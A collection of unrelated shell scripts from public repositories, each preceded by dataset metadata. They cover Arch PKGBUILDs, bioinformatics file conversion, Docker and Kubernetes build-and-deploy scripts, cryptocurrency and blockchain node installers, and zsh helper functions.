db81cfa6b1a6674de1aeab3159bcf358eb566e3a
|
Shell
|
petronny/aur3-mirror
|
/finalterm-git/PKGBUILD
|
UTF-8
| 1,340
| 2.796875
| 3
|
[] |
no_license
|
# Maintainer : Valentin Hăloiu <vially.ichb+aur@gmail.com>
# Contributor : Martin Wimpress <code@flexion.org>
# PKGBUILD for the git version of Final Term.  Builds from upstream master
# with one cherry-picked PR patch, then wraps the binary so it always runs
# under the X11 Clutter backend.
_pkgname=finalterm
pkgname=${_pkgname}-git
pkgver=191.39b078b
pkgrel=1
pkgdesc="A new breed of terminal emulator"
arch=('x86_64' 'i686')
url="http://finalterm.org"
license=('GPL3')
depends=('clutter-gtk' 'desktop-file-utils' 'libgee' 'libkeybinder3' 'libnotify' 'mx')
makedepends=('cmake' 'git' 'intltool' 'vala')
provides=('finalterm')
conflicts=('finalterm')
source=("${pkgname}::git+https://github.com/p-e-w/${_pkgname}.git" "PR409.patch::https://github.com/joshslark/finalterm/commit/04697ea8632feb691238000c856f89f60cc0a612.patch")
sha1sums=('SKIP' '5e31d04378497bab14be9dd463e010d893d7e5cd')
install=${pkgname}.install
# Version string: <commit count>.<short hash> of master.
pkgver() {
cd "${srcdir}/${pkgname}"
echo $(git rev-list --count master).$(git rev-parse --short master)
}
build() {
cd "${srcdir}/${pkgname}"
# Apply the PR patch only if it still applies cleanly (idempotent rebuilds).
git apply --check ../PR409.patch && git apply ../PR409.patch
cmake -DCMAKE_INSTALL_PREFIX=/usr
make
}
package() {
cd "${srcdir}/${pkgname}"
make DESTDIR="${pkgdir}" install
# Move the real binary aside and install a wrapper that forces the X11
# Clutter backend.
mkdir -p "${pkgdir}/usr/share/${_pkgname}/bin"
mv "${pkgdir}/usr/bin/${_pkgname}" "${pkgdir}/usr/share/${_pkgname}/bin"
cat<<EOF > ${pkgdir}/usr/bin/${_pkgname}
#!/usr/bin/bash
CLUTTER_BACKEND=x11 /usr/share/${_pkgname}/bin/finalterm
EOF
chmod a+x ${pkgdir}/usr/bin/${_pkgname}
}
| true
|
b3dfb605f19b4504bdc394758e0543f2c520c213
|
Shell
|
Kilobyte22/pm-arch
|
/packages/plasma-camera-git/PKGBUILD
|
UTF-8
| 835
| 2.71875
| 3
|
[] |
no_license
|
# Maintainer: Bhushan Shah <bhush94 at gmail dot com>
# PKGBUILD for the git version of plasma-camera, built out-of-tree with CMake.
pkgname=plasma-camera-git
pkgver=r9.0a68cd2
pkgrel=1
pkgdesc="Simple camera application for mobile devices"
arch=('any')
url="https://community.kde.org/Plasma/Mobile"
license=('GPL3')
depends=('plasma-framework')
makedepends=('git' 'cmake')
provides=('plasma-camera')
source=('git://anongit.kde.org/plasma-camera.git')
md5sums=('SKIP')
_gitname="plasma-camera"
# Version string: r<commit count>.<short hash> of HEAD.
pkgver() {
cd plasma-camera
printf "r%s.%s" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)"
}
prepare() {
mkdir -p build
}
build() {
cd build
cmake ../plasma-camera \
-DCMAKE_INSTALL_PREFIX=/usr \
-DBUILD_TESTING=OFF \
-DLIB_INSTALL_DIR=lib \
-DKDE_INSTALL_USE_QT_SYS_PATHS=ON \
-DCMAKE_BUILD_TYPE=Release
make
}
package() {
cd build
make DESTDIR="$pkgdir/" install
}
| true
|
ee13a1f45181b80397aa8798255ee9a091ce318d
|
Shell
|
geparada/my_src
|
/Tools/sam2bai.sh
|
UTF-8
| 175
| 2.734375
| 3
|
[] |
no_license
|
# Convert every *.sam in the current directory into a sorted, indexed BAM
# (<name>.sort.bam + <name>.sort.bam.bai), deleting the SAM and the
# intermediate unsorted BAM on success.
#
# Fixes over the previous version:
#  - the old "samtools sort in.bam out1 out2" invocation was not a valid
#    sort command, and "samtools index" was never called, so the .bai the
#    script is named after was never produced;
#  - glob iteration instead of parsing `ls`, and all expansions quoted so
#    filenames with spaces work.
for sam in *.sam
do
	[ -e "$sam" ] || continue   # no *.sam files present: glob stayed literal
	name=${sam%.sam}
	samtools view -Sb "$sam" -o "$name.bam" \
		&& samtools sort "$name.bam" -o "$name.sort.bam" \
		&& samtools index "$name.sort.bam" \
		&& rm "$sam" "$name.bam"
done
| true
|
aefa705ca80512bc95f97e15ae585ab37d0db9ea
|
Shell
|
devopstguru/boto3
|
/read.sh
|
UTF-8
| 242
| 2.578125
| 3
|
[] |
no_license
|
#!/bin/bash
# Copy /etc/fstab to /fstab, extract the "/backup" mount entry (plus up to
# 100 following lines) into /fstabbackup, and upload that file to S3.
input="/etc/fstab"
# -f: do not error when the files from a previous run are absent.
rm -f /fstabbackup /fstab
# Straight copy replaces the old line-by-line read/echo loop, which was slow
# and silently dropped a final line lacking a trailing newline.
cp -- "$input" /fstab
# Keep the /backup line and everything after it (up to 100 lines).
grep -A100 /backup /fstab >> /fstabbackup
aws s3 cp /fstabbackup s3://cf-templates-tqftrjy4ugkm-us-east-1
| true
|
8ccc4193c133bff78b5df5a5eba7b397bcaef947
|
Shell
|
KEINOS/Broadcast-inside-Docker-network
|
/receiver/python3/receiver.sh
|
UTF-8
| 431
| 2.53125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# =============================================================================
# This script receives the broadcast message via "socat" command and pipes the
# STDOUT output to the Python3 script.
# =============================================================================
# PORT_UDP_BROADCAST must be set in the environment; "fork" makes socat keep
# listening after each datagram.  Each received line is fed to the Python
# script as a fresh one-line stdin (one interpreter launch per line).
socat -u UDP-LISTEN:$PORT_UDP_BROADCAST,fork STDOUT |
while read line; do
# NOTE(review): $line is intentionally unquoted here, so runs of whitespace
# in the datagram are collapsed before reaching the Python script.
echo $line | /usr/local/bin/python /app/parrotry.py
done
| true
|
a0eb05cebc1e765dc857b33ecf6b229c6e6e1f2d
|
Shell
|
aston-r/fibonacci
|
/deploy-k8s.sh
|
UTF-8
| 1,884
| 4.09375
| 4
|
[] |
no_license
|
#!/bin/bash
# Build the per-service Docker images for the fibonacci project, optionally
# push them to Docker Hub (--publish) and roll them out to Kubernetes
# (--deploy).  Images are tagged both "latest" and with the current git SHA.
# Fail on any '$? > 0'
set -o errexit
# Constants
DOCKER_HUB_ACCOUNT='yevhenlodovyi'
PROJECT_NAME='fibonacci'
# Functions
function usage() {
echo """
Usage: $0 [--publish|--deploy|]
Args:
--publish: Publish Docker image into registry
--deploy: Deploy k8s configuration
"""
exit 0
}
# Main part
# Parse long options with getopt(1); unknown options fall through to usage.
opts="$(getopt -o '' -l 'publish,deploy,help' -- "$@")"
eval set -- "${opts}"
while true; do
case "${1}" in
'--publish') publish='Y'; shift 1;;
'--deploy') deploy='Y'; shift 1;;
'--help') usage;;
'--') shift; break ;;
*) break ;;
esac
done
# Get the latest commit id
git_sha="$(git rev-parse HEAD)"
# Build and ulpload images to docker registry
# NOTE: nginx is used only in docker-compose configuration, so skip it.
# Each immediate subdirectory containing a Dockerfile becomes one image.
subdirs="$(find . -maxdepth 2 -name 'Dockerfile' -not -path './nginx/*' -printf '%p\n' \
| xargs -I {} dirname {} \
| xargs -I {} basename {})"
for subdir in ${subdirs}; do
tag_prefix="${DOCKER_HUB_ACCOUNT}/${PROJECT_NAME}-${subdir}"
echo "Building '${tag_prefix}' image to registry..."
docker build -t "${tag_prefix}:latest" \
-t "${tag_prefix}:${git_sha}" \
"${subdir}"
if [[ "${publish}" == 'Y' ]]; then
echo "Uploading '${tag_prefix}' to registry..."
docker push "${tag_prefix}:latest"
docker push "${tag_prefix}:${git_sha}"
fi
done
# Deploy k8s
if [[ "${deploy}" == 'Y' ]]; then
echo 'Deploying k8s configuration...'
kubectl apply -f k8s
# Force deployments to re-pull an image
# TODO:check if there is more convinient way:
# https://github.com/kubernetes/kubernetes/issues/33664
for subdir in ${subdirs}; do
kubectl set image "deployments/${subdir}-deployment" \
"${subdir}=${DOCKER_HUB_ACCOUNT}/${PROJECT_NAME}-${subdir}:${git_sha}"
done
fi
| true
|
76d87c69c2f95d287434d20f79161dfb7a49c23a
|
Shell
|
postarc/geekcash
|
/install.sh
|
UTF-8
| 7,047
| 3.84375
| 4
|
[] |
no_license
|
#!/bin/bash
# install.sh
# Installs masternode on Ubuntu 16.04 x64 & Ubuntu 18.04
# ATTENTION: The anti-ddos part will disable http, https and dns ports.
# Flow: wipe/create ~/.geekcash, install the vizd-style binaries, write
# geekcash.conf with random RPC credentials, obtain a masternode key (typed
# in, or generated via a temporary daemon), install sentinel + cron jobs,
# open firewall ports, and start geekcashd.
BINTAR='geekcash-1.3.0-x86_64-linux-gnu.tar.gz'
BINADDR='https://github.com/GeekCash/geek/releases/download/v1.3.0.1/geekcash-1.3.0-x86_64-linux-gnu.tar.gz'
BPATH='geekcash-1.3.0/bin'
RPCPORT=6888
PORT=6889
COIN_PORT=6889
# Retry budget for masternode-key generation: TRYCOUNT attempts, WAITP
# seconds apart.
TRYCOUNT=15
WAITP=3
if [[ "$USER" == "root" ]]; then
HOMEFOLDER="/root"
else
HOMEFOLDER="/home/$USER"
fi
sudo apt-get install -y curl >/dev/null 2>&1
sudo apt-get install -y lsof >/dev/null 2>&1
#while [ -n "$(sudo lsof -i -s TCP:LISTEN -P -n | grep $RPCPORT)" ]
#do
#(( RPCPORT--))
#done
echo -e "\e[32mFree RPCPORT address:$RPCPORT\e[0m"
#while [ -n "$(sudo lsof -i -s TCP:LISTEN -P -n | grep $PORT)" ]
#do
#(( PORT++))
#done
echo -e "\e[32mFree MN port address:$PORT\e[0m"
# Refuse to run via sudo from a non-root account (EUID 0 but USER != root).
if [[ $EUID -eq 0 ]] && [ "$USER" != "root" ]; then
echo -e "${RED}$0 must be run whithout sudo.${NC}"
exit 1
fi
cd
# Existing data dir: optionally kill the daemon and wipe it before reinstall.
if [ -d .geekcash ]; then
printf "~/.geekcash/ already exists! The installer will delete this folder. Continue anyway?(Y/n):"
read REPLY
if [ "$REPLY" == "y" ] || [ "$REPLY" == "" ] || [ "$REPLY" == "Y" ]; then
pID=$(ps -u $USER -e | grep geekcashd | awk '{print $1}')
if [ $pID ]; then sudo kill ${pID} && sleep 5; fi
rm -rf ~/.geekcash
fi
fi
mkdir .geekcash
# The RPC node will only accept connections from your localhost
_rpcUserName=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 12 ; echo '')
# Choose a random and secure password for the RPC
_rpcPassword=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 32 ; echo '')
# Get the IP address of your vps which will be hosting the masternode
_nodeIpAddress=`curl ifconfig.me/ip`
#_nodeIpAddress=$(curl -s 4.icanhazip.com)
# Only set externalip if the lookup returned something IPv4-shaped.
if [[ ${_nodeIpAddress} =~ ^[0-9]+.[0-9]+.[0-9]+.[0-9]+$ ]]; then
external_ip_line="externalip=${_nodeIpAddress}:$COIN_PORT"
else
external_ip_line="#externalip=external_IP_goes_here:$COIN_PORT"
fi
# Make a new directory for geekcash daemon
#mkdir ~/.geekcash/
#touch ~/.geekcash/geekcash.conf
# Download geekcash and put executable to /usr/bin
echo -e "\e[32mChecking bin files...\e[0m"
#wget -qO- --no-check-certificate --content-disposition
# Remove stale copies in /usr/local/bin; /usr/bin is the canonical location.
if [ -f "/usr/local/bin/geekcashd" ]; then
rm /usr/local/bin/geekcashd
rm /usr/local/bin/geekcash-cli
fi
if [ -f "/usr/bin/geekcashd" ]; then
echo "Bin files exist, skipping copy."
else
echo -e "\e[32mGeekCash downloading...\e[0m"
echo "get and unzip..."
mkdir temp
cd temp
wget $BINADDR
tar -xzvf $BINTAR
#curl -LJO $BINADDR
#tar -xzvf $BINTAR
echo -e "\e[32mPut executable to /usr/bin\e[0m"
sudo bash -c "cp ./$BPATH/geekcashd /usr/bin/"
sudo bash -c "cp ./$BPATH/geekcash-cli /usr/bin/"
sudo chmod +x /usr/bin/geekcash*
cd ..
rm -rf temp
fi
# Change the directory to ~/.geekcash
cd ~/.geekcash/
echo -e "\e[32mCreate the initial geekcash.conf file...\e[0m"
# Create the initial geekcash.conf file
echo -e "rpcuser=${_rpcUserName}
rpcpassword=${_rpcPassword}
rpcallowip=127.0.0.1
rpcport=$RPCPORT
listen=1
server=1
daemon=1
logtimestamps=1
maxconnections=64
txindex=1
${external_ip_line}
port=$PORT
" > geekcash.conf
# Get a new privatekey by going to console >> debug and typing masternode genkey
printf "Enter Masternode PrivateKey: "
read _nodePrivateKey
# No key typed in: start the daemon temporarily and poll "masternode genkey"
# until it succeeds or the retry budget is exhausted.
if [[ -z "$_nodePrivateKey" ]]; then
geekcashd -daemon
sleep 3
if [ -z "$(ps axo cmd:100 | grep geekcashd)" ]; then
echo -e "${GREEN}$COIN_NAME server couldn not start."
exit 1
fi
ERROR=1
if [[ "$ERROR" -gt "0" ]]; then echo -n "Daemon initialized, please wait ..."; fi
while [ "$ERROR" -gt "0" ] && [ "$TRYCOUNT" -gt "0" ]
do
sleep $WAITP
_nodePrivateKey=$(geekcash-cli masternode genkey) >/dev/null 2>&1
ERROR=$?
if [ "$ERROR" -gt "0" ]; then
echo -n "."
fi
TRYCOUNT=$[TRYCOUNT-1]
done
geekcash-cli stop
fi
if [[ -z "$_nodePrivateKey" ]]; then
echo "Masternode key could not be generated. Edit the config file manually."
fi
# Write masternode privat key to geekcash.conf file
echo -e "
masternode=1
masternodeprivkey=${_nodePrivateKey}
" >> geekcash.conf
cd
# Create a directory for masternode's cronjobs and the anti-ddos script
mkdir -p masternode/geekcash
# Download the appropriate scripts
echo -e "\e[32mCopy scripts...\e[0m"
cp geekcash/makerun.sh masternode/geekcash
cp geekcash/checkdaemon.sh masternode/geekcash
cp geekcash/clearlog.sh masternode/geekcash
#Sentinel installing
echo -e "\e[32mSentinel installing...\e[0m"
sudo apt-get update
#>/dev/null 2>&1
sudo apt-get -y install python
#>/dev/null 2>&1
sudo apt-get -y install python-virtualenv
sudo apt-get -y install python3-virtualenv
#>/dev/null 2>&1
cd ~ && cd .geekcash
git clone https://github.com/geekcash/sentinel.git && cd sentinel
virtualenv ./venv
./venv/bin/pip install -r requirements.txt
# Create sentinel.conf file
echo -e "
# specify path to geekcash.conf or leave blank
# default is the same as GeekCash
geekcash_conf=$HOMEFOLDER/.geekcash/geekcash.conf
# valid options are mainnet, testnet (default=mainnet)
network=mainnet
#network=testnet
# database connection details
db_name=database/sentinel.db
db_driver=sqlite
" > sentinel.conf
# Create a cronjob for making sure geekcashd runs after reboot
# Each crontab entry is added only if not already present (idempotent).
echo -e "\e[32mCreate a cronjob for making sure geekcashd runs after reboot\e[0m"
if ! crontab -l | grep "@reboot /usr/bin/geekcashd"; then
(crontab -l ; echo "@reboot /usr/bin/geekcashd") | crontab -
fi
# Create a cronjob for making sure geekcashd is always running
if ! crontab -l | grep "masternode/geekcash/makerun.sh"; then
(crontab -l ; echo "*/5 * * * * ~/masternode/geekcash/makerun.sh") | crontab -
fi
# Create a cronjob for making sure the daemon is never stuck
if ! crontab -l | grep "masternode/geekcash/checkdaemon.sh"; then
(crontab -l ; echo "*/30 * * * * $HOMEFOLDER/masternode/geekcash/checkdaemon.sh") | crontab -
fi
# Create a cronjob for clearing the log file
if ! crontab -l | grep "masternode/geekcash/clearlog.sh"; then
(crontab -l ; echo "0 0 */2 * * $HOMEFOLDER/masternode/geekcash/clearlog.sh") | crontab -
fi
# Create a cronjob for sentinel
if ! crontab -l | grep ".geekcash/sentinel"; then
(crontab -l ; echo -e "* * * * * cd $HOMEFOLDER/.geekcash/sentinel && ./venv/bin/python bin/sentinel.py >/dev/null 2>&1") | crontab -
fi
# Change the directory to ~/masternode/
cd $HOMEFOLDER/masternode/geekcash
# Give execute permission to the cron scripts
chmod 0700 ./makerun.sh
chmod 0700 ./checkdaemon.sh
chmod 0700 ./clearlog.sh
# Firewall security measures
echo "Install firewall & adding firewalls rules..."
sudo apt install ufw -y >/dev/null 2>&1
sudo ufw allow $PORT/tcp >/dev/null 2>&1
sudo ufw allow $RPCPORT/tcp >/dev/null 2>&1
sudo ufw allow ssh >/dev/null 2>&1
sudo ufw logging on >/dev/null 2>&1
sudo ufw default allow outgoing >/dev/null 2>&1
sudo ufw --force enable
# Start GeekCash Deamon
geekcashd
cd
rm -rf geekcash
# Reboot the server
#reboot
| true
|
1375de53112b22f74dcd0f8bd6048dc912e829f8
|
Shell
|
cnewcome/scripts
|
/listcol.joe
|
UTF-8
| 2,626
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/bash
# Passing a $1 argument will list all collectors that have a string that matches that argument.
# Passing no argument will use your current working directory and strip out the machinesig
# and use that to list all matching collectors with same machinesig.
# CRN - 2016-03-10 -- rewrote the search potion to work faster. It now displays the newest collector first.
# BAH - 2016-06-24 -- added -n= limit to allow it to return faster for scripting purposes.
# CRN - 2016-07-01 -- added -g to automatically take you to the newest collector found with -c or pwd.
# CRN - 2016-07-06 -- added -d to only check a single date.
COUNT=0;MAX_C=10
CFLAG=0;FFLAG=0;DFLAG=0
# Parse -c= / -d= / -f= / -n= / -g flags; anything else prints usage.
if test $# -gt 0; then
for flag in "$@"; do
case $flag in
-c=*)
CFLAG=1
CSEARCH="${flag#*=}"
shift
;;
-d=*)
DFLAG=1
DATE_SEARCH="${flag#*=}"
shift
;;
-f=*)
FFLAG=1
FIND="${flag#*=}"
shift
;;
-n=*)
MAX_C="${flag#*=}"
shift
;;
-g)
GO=1
MAX_C=1
;;
*)
echo "Invalid argument: ${flag#*}"
echo " -c= String in collector filename to search for"
echo " -f= Filename to find within the collector"
echo " -g= Automatically go to the newest collector matching -c"
echo " -n= Output this many ingested paths maximum; default 10"
exit
;;
esac
done
fi
# No -c given: derive the search string (machinesig) from the current
# working directory path (6th path component, 4th dash-separated field).
if [[ $CFLAG -eq 0 ]]; then
CSEARCH=$(pwd | awk -F/ '{print $6}' | awk -F- '{print $4}')
fi
if [[ $FFLAG -eq 1 ]]; then
# -f mode: list matching files inside every matching collector directory.
for loop in $(ls -d ~/ingested/2*/*$CSEARCH*); do
find $loop -name "*${FIND}*" -exec ls -la {} \;
done
else
if [[ ! -z $CSEARCH ]]; then
if [[ $DFLAG -eq 0 ]]; then
# Walk date directories newest-first; within each date, glob for the
# collector.  If the glob found nothing it stays literal, which is what
# the string comparison below detects.
for loop in $(echo ~/ingested/20* | sed 's/ /\n/g' | sort -n -r); do
CL=$(echo $loop/*$CSEARCH* | sed 's/ /\n/g' | sort -n -r 2> /dev/null)
if [[ "$CL" != "$loop/*$CSEARCH*" ]]; then
for COL in $(echo $CL); do
if [[ $GO -eq 1 ]]; then
cpwd "$COL"
else
echo $COL
fi
COUNT=$(($COUNT + 1))
# Stop once the -n limit has been printed.
if [[ "$COUNT" -ge "$MAX_C" ]]; then
exit;
fi
done
fi
done
else
# -d mode: only look inside the one requested date directory.
ls -d ~/ingested/${DATE_SEARCH}/*$CSEARCH* 2> /dev/null
fi
fi
fi
| true
|
9cf71765e4bf0b9aedf56b11cd6d80e09ad5921d
|
Shell
|
HexHive/FuZZan
|
/LLVM/scripts/install-msan-files.sh
|
UTF-8
| 850
| 2.671875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# This script softlinks our modified MSan files into the LLVM source tree.
# Run it from the checkout root: it expects ./src/compiler-rt-files (our
# modified sources) and ./compiler-rt (the upstream tree) to exist.
src=`pwd`/src
runtime=`pwd`/compiler-rt
msan_dir="$runtime/lib/msan"
# Files whose name is the same in both trees: replace each with a symlink.
# rm -f keeps the script quiet and idempotent when a file is already gone
# (the old bare `rm` printed errors on re-runs).
for f in msan_allocator.cc msan.h msan_linux.cc msan_interceptors.cc msan_origin.h; do
	rm -f "$msan_dir/$f"
	ln -s "$src/compiler-rt-files/$f" "$msan_dir/$f"
done
# CMakeLists.txt is stored under a different name in our source tree.
rm -f "$msan_dir/CMakeLists.txt"
ln -s "$src/compiler-rt-files/lib_msan_cmakelists.txt" "$msan_dir/CMakeLists.txt"
| true
|
05ac109ad210873ca74a5065053fd66cd2462b30
|
Shell
|
BME-DDB/SparkServer
|
/shell/build.sh
|
UTF-8
| 679
| 3.46875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# /***
# * Build and clean script for spark-server
# * @author manistein
# * @since 2019-04-19
# */
# Usage: ./build.sh all|clean|rebuild
parentPath=$(dirname $(pwd))
function build() {
# Build spark-server with msbuild (MONO_IOMAP=case tolerates
# case-mismatched paths under Mono), then make the output executable.
echo "====================="
echo "start build spark-server"
cd $parentPath/spark-server
MONO_IOMAP=case msbuild SparkServer.sln
cd $parentPath/spark-server/server/bin/Debug
chmod 755 *
}
function clean() {
# Clean spark-server: wipe everything under server/bin.
echo "====================="
echo "start clean spark-server"
cd $parentPath/spark-server/server/bin
rm -rf *
}
if [[ "$1" == "all" ]]; then
build
elif [[ "$1" == "clean" ]]; then
clean
elif [[ "$1" == "rebuild" ]]; then
clean
build
else
echo "不存在$1指令"
fi
| true
|
11d46bdcd45af291c00e9b4dcb915af0f3dd6616
|
Shell
|
a-mail-group/coherent
|
/src/sys.r12/conf/cohmain/src/mkdev.sh
|
UTF-8
| 1,180
| 3.390625
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
# cohamin/mkdev - get general system configuration
# Revised: Wed Mar 2 18:10:11 1994 CST
DEVDIR=/dev
. /usr/lib/shell_lib.sh
COMMAND_NAME=$0
source_path $0 "HOME_DIR="
parent_of $HOME_DIR "CONF_DIR="
. $CONF_DIR/bin/conf_lib.sh
# Things to do:
#
# Check on CYRIX configuration.
CXHW=$($CONF_DIR/bin/cxtype)
case $CXHW in
Cx486*)
# Cyrix upgrade part. Enable cache?
while : ; do
get_tunable CYRIX_CACHE_SPEC cxc
if [ $cxc -eq 0 ];then
cxcyn=n
elif [ $cxc -eq 1 ];then
cxcyn=y
else
cxcyn=???
fi
read_input "\nEnable Cyrix 486 internal cache" \
new_cxcyn $cxcyn require_yes_or_no
# Convert yes or no to, specifically, "y" or "n".
if is_yes $new_cxcyn; then
new_cxcyn=y
else
new_cxcyn=n
fi
is_equal $cxcyn $new_cxcyn || {
if is_equal $new_cxcyn n; then
echo "Cache will be disabled."
cxc=0
else
echo "Cache will be enabled."
cxc=1
fi
}
$CONF_DIR/bin/idtune -f CYRIX_CACHE_SPEC $cxc
read_input "Is Cyrix cache setting correct" ANS "y" \
require_yes_or_no
is_yes $ANS && break
done
;;
*)
# Not a Cyrix upgrade part. Nothing to do.
;;
esac
exit 0
| true
|
08ed68d258ebe2403b2ce278bb6a027eb4f93aff
|
Shell
|
mad-max-traveller/viz_scripts
|
/Seed node/1_zero_build_viz.sh
|
UTF-8
| 3,460
| 2.671875
| 3
|
[] |
no_license
|
#!/bin/bash
# Build a VIZ seed node from source: install build deps, set up swap and
# /dev/shm, compile vizd + cli_wallet, install the state snapshot, and write
# the node's config.ini.  WORKDIR / WORKDIR_SWAP come from config.sh.
. config.sh
apt-get update && apt-get install -y build-essential autoconf automake cmake g++ git libssl-dev libtool make pkg-config python3 python3-jinja2 libboost-chrono-dev libboost-context-dev libboost-coroutine-dev libboost-date-time-dev libboost-filesystem-dev libboost-iostreams-dev libboost-locale-dev libboost-program-options-dev libboost-serialization-dev libboost-signals-dev libboost-system-dev libboost-test-dev libboost-thread-dev doxygen libncurses5-dev libreadline-dev perl
# 10G swap file, registered in /etc/fstab so it survives reboots.
fallocate -l 10G $WORKDIR_SWAP/swapfile
ls -lh $WORKDIR_SWAP/swapfile
chmod 600 $WORKDIR_SWAP/swapfile
mkswap $WORKDIR_SWAP/swapfile
swapon $WORKDIR_SWAP/swapfile
swapon --show
mount -o remount,size=10G /dev/shm
mount -l | grep "/dev/shm"
free -h
echo '$WORKDIR_SWAP/swapfile none swap sw 0 0' | tee -a /etc/fstab
cat /etc/fstab
sysctl vm.swappiness=80
sysctl vm.vfs_cache_pressure=50
echo "vm.swappiness=80" >> /etc/sysctl.conf
echo "vm.vfs_cache_pressure=50" >> /etc/sysctl.conf
tail /etc/sysctl.conf
# Time zone configuration is interactive (pick region/location by number).
# It can be re-run later with: sudo dpkg-reconfigure tzdata.
apt-get install -y screen tzdata
cd $WORKDIR
git clone https://github.com/VIZ-World/viz-world.git
cd $WORKDIR/viz-world
#git checkout master
git checkout mainnet-dev
#git checkout mainnet-test2
git submodule update --init --recursive -f
mkdir $WORKDIR/viz-world/build
cd $WORKDIR/viz-world/build
cmake -DCMAKE_BUILD_TYPE=Release ..
# Build daemon and wallet; compiler output goes to the buildlog files.
cd $WORKDIR/viz-world/build/ && nohup make -j$(nproc) vizd > buildlog_vizd.txt
cd $WORKDIR/viz-world/build/ && nohup make -j$(nproc) cli_wallet > buildlog_cli_wallet.txt
# cd $WORKDIR/viz-world/build/programs/vizd/ && rm -f screenlog.0 && screen -dmLS vizd $WORKDIR/viz-world/build/programs/vizd/vizd --resync
# sleep 5s
# screen -S vizd -p 0 -X quit
# Copy the snapshot into the data dir next to the executable.
mkdir $WORKDIR/viz-world/build/programs/vizd/witness_node_data_dir
cp $WORKDIR/viz-world/share/vizd/snapshot.json $WORKDIR/viz-world/build/programs/vizd/witness_node_data_dir
# Write the node's config file.
cat <<EOT > $WORKDIR/viz-world/build/programs/vizd/witness_node_data_dir/config.ini
shared-file-dir = "blockchain"
shared-file-size = 2G
inc-shared-file-size = 2G
min-free-shared-file-size = 500M
block-num-check-free-size = 1000
single-write-thread = 0
clear-votes-before-block = 0
skip-virtual-ops = 0
enable-plugins-on-push-transaction = 0
follow-max-feed-size = 500
webserver-thread-pool-size = 256
# minimal plugins
plugin = chain p2p json_rpc webserver network_broadcast_api
p2p-seed-node = 172.104.132.57:9099
p2p-seed-node = 94.16.120.147:4248
p2p-seed-node = 142.93.228.7:2001
p2p-seed-node = 178.62.61.190:8099
p2p-seed-node = 13.81.61.249:2001
p2p-seed-node = 54.93.168.9:2001
p2p-endpoint = 0.0.0.0:8082
enable-stale-production = true
required-participation = 0
[log.console_appender.stderr]
stream = std_error
[log.file_appender.p2p]
filename = logs/p2p/p2p.log
[logger.default]
level = all
appenders = stderr
[logger.p2p]
level = all
appenders = p2p
EOT
# Start the node in a screen session (left disabled on purpose):
#
#cd $WORKDIR/viz-world/build/programs/vizd/ && rm -f screenlog.0 && screen -dmLS vizd $WORKDIR/viz-world/build/programs/vizd/vizd --resync
exit 0
| true
|
bf04e908a2ab309949b13812be18c6687564ef8f
|
Shell
|
bspan2001/docker-images
|
/ruby/build.sh
|
UTF-8
| 1,284
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash -ex
# Build, cache and push the szewec/ruby Docker images, one tag per supported
# Ruby version. Behaviour flags (set to "true" to enable):
#   PULL_IMAGES      - pull existing tags first (cache warm-up)
#   PULL_IMAGES_ONLY - skip the build/save phase
#   ENABLE_CACHE     - docker-save the built images into ${CACHE_DIR}
#   PUSH_IMAGES      - push all tags to the registry
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
IMAGE_NAME="szewec/${DIR##*/}"
CACHE_DIR="${CACHE_DIR:-${DIR}/.cache}"
# All Ruby versions built from ./<version>/Dockerfile; LATEST also gets the
# "latest" tag. Previously every docker command was written out per version.
VERSIONS=(2.2 2.3 2.4)
LATEST=2.4
source "$DIR/../lib.sh"

if [[ "$PULL_IMAGES" = "true" ]]; then
  # pull all tags of the docker image (|| true: a tag may not exist yet)
  for v in "${VERSIONS[@]}"; do
    docker pull "${IMAGE_NAME}:${v}" || true
  done
  docker pull "${IMAGE_NAME}:latest" || true
fi

if [[ "$PULL_IMAGES_ONLY" != "true" ]]; then
  # build docker image with one tag per version; LATEST is dual-tagged
  for v in "${VERSIONS[@]}"; do
    if [[ "$v" = "$LATEST" ]]; then
      docker build -t "${IMAGE_NAME}:${v}" -t "${IMAGE_NAME}:latest" --force-rm "${DIR}/${v}"
    else
      docker build -t "${IMAGE_NAME}:${v}" --force-rm "${DIR}/${v}"
    fi
  done

  if [[ "$ENABLE_CACHE" = "true" ]]; then
    # save docker images into the cache dir; IMAGE_NAME contains a "/" so the
    # szewec/ sub-directory must exist first
    mkdir -p "${CACHE_DIR}/szewec"
    for v in "${VERSIONS[@]}"; do
      docker save -o "${CACHE_DIR}/${IMAGE_NAME}-${v}.tar" "${IMAGE_NAME}:${v}"
    done
  fi
fi

if [[ "$PUSH_IMAGES" = "true" ]]; then
  # push all tags of the docker image
  for v in "${VERSIONS[@]}"; do
    docker push "${IMAGE_NAME}:${v}"
  done
  docker push "${IMAGE_NAME}:latest"
fi
| true
|
588ef38c2e30be5ca4ff4af8740256519ddccf67
|
Shell
|
manicminer/dotfiles
|
/functions
|
UTF-8
| 7,273
| 4.0625
| 4
|
[
"Apache-2.0"
] |
permissive
|
# These only work with zsh
# Walk upward from a start directory (arg 2, default $PWD) looking for an
# entry named $1; print its full path and return 0, or return 1 when no
# ancestor contains it. Uses the global ${_path} scratch variable, matching
# its sibling find_up_all.
find_up() {
  _path="${2:-${PWD}}"
  while [[ -n "${_path}" ]] && [[ ! -e "${_path}/${1}" ]]; do
    # strip the last path component and try the parent
    _path="${_path%/*}"
  done
  [[ -n "${_path}" ]] || return 1
  echo "${_path}/${1}"
}
# Like find_up, but collect *every* ancestor directory (start dir $2,
# default $PWD) containing an entry named $1. Prints one match per line,
# root-most first (the zsh (Oa) flag reverses the collected array), and
# returns 1 when nothing matched. zsh-only: $#_result and ${(Oa)...}.
find_up_all() {
  if [[ -n "${2}" ]]; then
    _path="${2}"
  else
    _path="${PWD}"
  fi
  _result=()
  # Visit every ancestor until _path is stripped down to the empty string.
  while [[ "${_path}" != "" ]]; do
    [[ -e "${_path}/${1}" ]] && _result+=("${_path}/${1}")
    _path="${_path%/*}"
  done
  if [[ $#_result > 0 ]]; then
    printf "%s\n" "${(Oa)_result[@]}"
    return 0
  fi
  return 1
}
# Portable md5 checksum: prefer GNU md5sum, fall back to BSD md5 (macOS),
